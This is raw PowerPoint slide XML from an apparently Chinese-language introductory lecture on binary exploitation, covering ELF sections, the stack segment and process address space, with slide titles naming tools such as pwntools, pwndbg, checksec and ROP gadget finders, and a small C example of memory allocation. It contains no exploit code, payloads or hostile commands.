              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Data segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）包含了可读可写数据</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.data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节 </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.dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节 </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.got </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节 </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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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节</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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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节 </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a:t>
            </a:r>
          </a:p>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栈段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Stack segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914C381E-7298-4686-8607-7A7C570B311A}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程虚拟地址空间</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2413118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99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="1992853" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222729339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99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="1540806" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>dbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"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219280098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99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="1992853" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>sec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"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426567306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99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="2218877" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"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384830741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99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="2444900" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>One_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>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898749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129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A9693D-1A5B-4E5E-A51B-AAAE2A96A437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856352" y="2611497"/>
            <a:ext cx="4346715" cy="3515348"/>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US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>glb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>char* str = “Hello world!”;</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int sum(int x, int y)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</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int t = x + y;</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return t;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int main() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    sum(1, 2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    void* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> = malloc(0x100);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    read(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>, 0x100);  // input “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>deadbeef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549B3D12-28A7-40B0-92F4-EE1F883F00A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5203067" y="4369171"/>
            <a:ext cx="1777381" cy="4256"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D44FFC-1C62-46F9-B4D6-A27301FF655E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306927" y="3990805"/>
            <a:ext cx="1569660"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rPr>
              <a:t>编译链接执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87B1B5B-680F-4CD7-9FDB-067A58F33529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2283351" y="1976123"/>
            <a:ext cx="1492716"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语言源代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E28E50-13F3-4E7B-8ECF-BAA2AB2D90C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6980448" y="1408841"/>
            <a:ext cx="4224176" cy="5172264"/>
            <a:chOff x="6503924" y="1331567"/>
            <a:chExt cx="4790847" cy="5237782"/>
          </a:xfrm>
